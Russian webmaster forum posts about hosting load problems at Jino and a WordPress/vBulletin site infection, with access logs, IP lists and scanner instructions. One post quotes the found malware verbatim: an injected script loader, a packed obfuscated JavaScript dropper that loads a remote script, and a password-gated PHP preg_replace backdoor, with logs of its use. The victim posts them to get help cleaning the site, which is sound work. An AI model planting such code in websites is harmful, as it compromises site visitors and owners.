AAAAllleex

Рейтинг
22
Регистрация
29.04.2013
Ladycharm:
- включите кэширование
- заблокируйте в htaccess 81.177.140.52 3399 AVGURO-NET, он вам 10% создаёт.

AVGURO-NET думаю, это и есть jino (хостер) у них так юр. лицо называется.

Ladycharm:

Посмотрите что за "176.102.37.87 578 UKRAINE", скорее всего тоже можно в бан. Возможно, ваш сайт парсят левые боты.

Зарегистрирован на физика в Киеве. Можа какой тамошний поисковый бот. Только его если блокирнуть.

---------- Добавлено 14.02.2015 в 21:05 ----------

Хостер в очередной раз отписался:

Ким Эдуард 14.02.2015 17:45

Здравствуйте.

На аккаунте регистрируется нагрузка на процессор сервера:

https://cp-hosting.jino.ru/statistics/resources/chart/cpu/week/2015-02-14/

При общей нагрузке на аккаунт могут наблюдаться проблемы с доступом ко всем сайтам, расположенных на нём.

Öèòàòà:

На сколько ограничение? Это предусмотрено договором?

Можно ли получать уведомления об ограничении и снятии ограничений?

Ограничения по нагрузке указаны в публичной оферте:

http://www.jino.ru/buy/offer.html

Для стандартного аккаунта уделяется 10% от общей процессорной мощности. Ограничения постоянны и не снимаются, в целях стабилизации работы сервера.

На сайте pravogroup.ru регистрируется большое количество запросов из сети Яндекса:

https://cp-hosting.jino.ru/statistics/logs/access/pravogroup.ru/

Данные запросы создают нагрузку. Мы добавили в файл robots.txt директиву "Crawl-delay: 60" для снижение частоты запросов.

Öèòàòà:

Укажите, пожалуйста, в логе хотя бы 1 фрагмент, который указывает на злонамеренность посетителя, чтобы мы его могли блокировать.

На сайте arbitraz.ru было замечено большое количество запросов из зарубежных подсетей:

https://cp-hosting.jino.ru/statistics/logs/access/arbitraz.ru/

Öèòàòà:

144.76.29.162 - - [14/Feb/2015:11:47:57 +0300] "GET /novosti/347.htm?mode=threaded HTTP/1.0" 301 -

208.115.113.88 - - [14/Feb/2015:11:48:00 +0300] "GET /calendar.php?do=add&c=1&day=2013-3-29 HTTP/1.0" 200 30158

148.251.124.174 - - [14/Feb/2015:11:48:07 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=643 HTTP/1.0" 200 26343

144.76.29.162 - - [14/Feb/2015:11:48:33 +0300] "GET /novosti/347.htm HTTP/1.0" 404 19444

208.115.113.88 - - [14/Feb/2015:11:48:59 +0300] "GET /calendar.php?do=add&c=1&day=2013-12-23 HTTP/1.0" 200 30162

148.251.124.174 - - [14/Feb/2015:11:49:04 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=658 HTTP/1.0" 200 26339

144.76.29.162 - - [14/Feb/2015:11:49:32 +0300] "GET /novosti/348.htm?mode=hybrid HTTP/1.0" 301 -

148.251.124.174 - - [14/Feb/2015:11:50:53 +0300] "GET /post_thanks.php?do=findthanks_user_gave&u=6671 HTTP/1.0" 200 26343

144.76.29.162 - - [14/Feb/2015:11:52:09 +0300] "GET /novosti/348.htm HTTP/1.0" 404 19450

Мы произвели блокировку адресов, с которых поступали однотипные запросы, которые могли создавать нагрузку.

Цитировать

Статус заявки изменён на «Требуется ваш ответ» (14.02.2015 17:45, Ким Эдуард)

Удивительно. Спасибо jino. К сожалению скорость пока не нормализовалась.

Топ 100 обращающихся. Ничего криминального.

За что меня так любит яндекс.

178.154.150.209 33654 YANDEX

37.140.141.37 4560 YANDEX

81.177.140.52 3399 AVGURO-NET

5.45.254.227 1421 YANDEX

37.140.141.36 773 YANDEX

176.102.37.87 578 UKRAINE

38.111.147.84 455 Oakland

5.45.254.225 292 YANDEX

157.55.39.98 264 Microsoft Corporation

37.140.141.38 244 YANDEX

157.55.39.70 223 Microsoft Corporation

157.55.39.137 196 Microsoft Corporation

207.46.13.120 178 Microsoft Corporation

5.45.254.226 113 YANDEX

217.69.133.216 102 MAIL-RU

217.69.133.84 92

95.108.129.207 90

217.69.133.218 87

213.180.206.197 85

37.9.118.17 85

217.69.133.217 84

217.69.133.85 84

217.69.133.215 83

66.249.64.21 81

66.249.78.245 73

217.69.133.219 72

217.69.133.67 72

66.249.64.29 71

66.249.78.252 70

66.249.64.25 69

188.165.15.191 65

157.55.39.69 65

157.55.39.136 65

66.249.78.238 63

46.161.41.199 58

188.165.15.78 57

188.165.15.94 57

188.165.15.98 56

188.165.15.121 55

188.165.15.188 54

188.165.15.50 52

188.165.15.10 49

188.165.15.105 45

54.235.100.22 45

188.165.15.234 43

54.235.94.95 43

188.165.15.208 42

178.32.149.16 40

66.249.69.77 39

66.249.69.93 32

54.235.98.169 30

213.180.206.205 29

37.140.141.40 27

66.249.64.22 27

66.249.64.30 27

193.189.117.243 26

123.126.113.104 25

199.16.156.124 25

46.39.235.82 25

157.55.39.122 24

95.167.189.100 23

199.16.156.125 23

178.154.224.114 22

95.167.189.77 22

64.187.238.122 22

66.249.69.61 21

86.184.212.38 21

199.16.156.126 21

176.103.152.28 20

66.249.79.62 19

37.115.202.31 18

54.235.99.68 18

148.251.138.201 17

95.108.128.241 17

66.249.64.26 17

23.21.82.184 16

95.167.189.66 16

100.43.90.12 16

54.235.97.10 15

5.255.253.4 14

66.249.79.70 14

74.125.176.149 13

91.121.163.214 12

66.249.79.78 12

74.125.176.147 11

80.252.18.27 11

146.0.77.95 10

178.154.243.110 10

185.3.149.130 10

178.154.243.108 10

141.105.66.179 9

37.57.231.240 9

82.145.221.216 9

217.118.79.27 9

74.125.176.150 8

199.59.148.209 8

146.0.79.23 8

146.0.74.206 8

2.93.204.176 8

В файле ip_nagruzka140215.txt приведены ip на максимальных нагрузках 14.02.15 (пики_нагрузок140215.doc).

Нагрузку создают поисковые роботы. Или я не прав?

unk 140760.doc
unk 140761.pdf
txt ip_nagruzka140215.txt

В свое время делал сервера на Debian и Ubuntu. Ничего сложного, если ставить www, почту, php и mysql, привязать к ndis и пробросить порты через роутер. Делал по мануальчику пару дней потратил.

В очередной раз озадачился этим вопросом из-за проблем с хостером jino - ограничивает скорость доступа при увеличении нагрузки.

Видимо скоро займусь. Буду рад хорошему мануалу с современными плюшками.

Очередное заражение

В файл navigation.js дописали:

document.write("<scr"+"ipt src='/wp-includes/js/mediaelement/candy.js'><"+"/script>");

и добавили файл:

wp-includes/js/mediaelement/candy.js

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 p(f){7(f).o("").n().r("")}5 b(d){k(3.j&&3.a){2 8=3["a"](\'s\')[0];2 4=3.j(\'t\');4.g(\'m\',"l/q");4.g(\'A\',d);8["C"](4)}}2 c="D://u.E.F/B";2 e="w";2 6=v["x"]["y"]();5 9(){7 6["h"](e)!=-1}5 i(){7 6.h("z")==-1}k(i()&&9()){b(c)}',42,42,'||var|document|HHHHVjwZ|function|JvvUnzHH|return|OWEV|jOYumjF|getElementsByTagName|LYXg|dbiq|sTXIqbf|fiJEYWgF|wzvPUChl|setAttribute|indexOf|KpkcHax|createElement|if|text|type|reverse|split|bXKzI|javascript|join|head|script|arreup|navigator|win|userAgent|toLowerCase|chrome|src|2832e2284ebcc386cd95d24cb037a953c9c8a4d04eabf0876b9349044f12b296b3aa647e68b0213fed1f15848a89b02310ad5905681726066009a3cb4baa35d6e190a962788e72bc41ff155027edf37571273924d8b9427a48e6a2222ab00281cb731057ea6ccc4195ca2f116cae5a2bd86613df|appendChild|http|pp|ua'.split('|'),0,{}))

в файле wp-includes/SimplePie/config.inc.php:

<?php

if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);

}

Вот лог использования файла:

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:01:26:55 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 213

5.39.47.1 [20/Jan/2014:01:26:59 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 65

5.39.47.1 [20/Jan/2014:16:06:34 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 218

5.39.47.1 [20/Jan/2014:16:06:35 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 214

5.39.47.1 [20/Jan/2014:21:30:45 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

oneGog:
А почему он должен ругаться-то ?


Глазами. Смотрите весь код и замечаете всё лишнее - только и всего :)


Подгрузил и посмотрел :)

Можно пошагово, как подгрузили и как выявили вредоносность?

---------- Добавлено 14.01.2014 в 02:01 ----------

kgtu5:
3 скрипта - вроде ничего страшного...

Еще раз большое спасибо.🍻🍻

kgtu5:
а воз и ныне там

Ну не совсем, удалил несколько левых php и swf.

kgtu5:

/clientscript/vbulletin_md5.js?v=387

За это отдельное спасибо 🍻🍻🍻😎😎😎

Ссылается он на еще один .js:

/images/regimage/backgrounds/reel.js

Пока не удаляю, пытаюсь понять как его обнаружили.

Firebug на вкладке скрипты показывает:

<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_important.css?v=387" />

<script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387"></script>

<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=387"></script>

<script type="text/javascript">

и не ругается.

Про vbulletin_md5.js не пишет вообще.

Каким средством это можно обнаружить?

www.siteguard.ru

Ругается еще на 3 скрипта, прав ли он, что думаете, господа?

<script type="text/javascript"><!-- window.google_analytics_uacct = 'UA-39617615-1'; var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-39617615-1'], ['_setVar', 'usergroup-1-Unregistered / Not Logged In'], ['_gat._anonymizeIp'], ['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //--></script>

<script type="text/javascript"> var _tbdef = {user: 'arbitraz.ru'}; (function(){ var d = document;var tbjs = d.createElement('script'); tbjs.type = 'text/javascript'; tbjs.async = true; tbjs.src = 'http://tweetboard.com/tb.js'; var tbel = d.getElementsByTagName('body')[0]; if(!tbel) tbel = d.getElementsByTagName('head')[0]; tbel.appendChild(tbjs); })(); </script>

<script type="text/javascript"> //<![CDATA[ window.orig_onload = window.onload; window.onload = function() { if (is_ie || is_moz) { var cpost=document.location.hash;if(cpost){ if(cobj = fetch_object(c********bstring(1,cpost.length)))cobj.scrollIntoView(true); }} if(typeof window.orig_onload == "function") window.orig_onload(); } //]]> </script>

---------- Добавлено 13.01.2014 в 07:11 ----------

oneGog:
Так Avast же там ничего не нашел 🍿
А сайт продолжает раздавать "подарки" всем "желающим" ( у кого в браузере разрешена Java ).

Отож. У меня Avast перестал ругаться.

Вы то как обнаружили, что эксплоиты подгружаются?

Кот в сапогах:
netwind, для меня автор айболита не является специалистом в области иб. И может даже он вообще к иб никакого отношения не имеет!
Сколько ваш автор айболита нашел 0dey дыр в ПО?
Чтобы взломать систему нужно гораздо больше знании чем ее "вылечить". Это мои слова. И как вы думаете кем для меня является ваш хваленый автор айболита?

Вы разработали своё ПО?

Почему вы решили, что если разработчику айболита заказать работу по безопасности он не справится?

ИМХО скрипт выполняет общие задачи и панацеей не может являться по определению.

kgtu5:
AAAAllleex, секрет фирмы....
когда все хорошо, взломов не бывает.
все сайты проверили?

Тут народ на хостеров грешит. Однако, всё может быть.

kgtu5:
AAAAllleex, что в отчете?

Всё хорошо.

Вы так и не сказали как нашли:(:(

kgtu5:
где то на вашем аккаунте хостинга незаметно лежит шелл, с помощью него и вписывают.
ай-болитом проверяли сайты?

Да. Экспресс метод. Полный метод через SSH не получается запустить:

Error: cannot run on php-cgi. Requires php as cli

See FAQ: http://revisium.com/ai/faq.php

В факе ничего об этой ошибке.

Работал по этому мануалу

кспресс-проверка (не рекомендуется):

-------------------------------------

1. в файле /ai-bolit/ai-bolit.php найти строку

define('PASS', '....

Вписать во вторых апострофах пароль, например mypass6.

define('PASS', 'MyPass234');

2. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

3. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

4. открыть в браузере http://ваш_сайт/ai-bolit.php?p=MyPass234 и ждать отчета

5. после отображения отчета удалить файлы от айболита и сам скрипт с сайта

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php

Полная проверка (рекомендуется):

--------------------------------

1. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

2. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

3. подключиться к серверу по ssh, перейти в папку сайта

4. выполнить команду в командной строке

php ai-bolit.php

5. дождаться окончания сканирования

6. скопировать с сервера файл AI-BOLIT-REPORT-<дата>-<время>.html

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php

1 2345 6
Всего: 54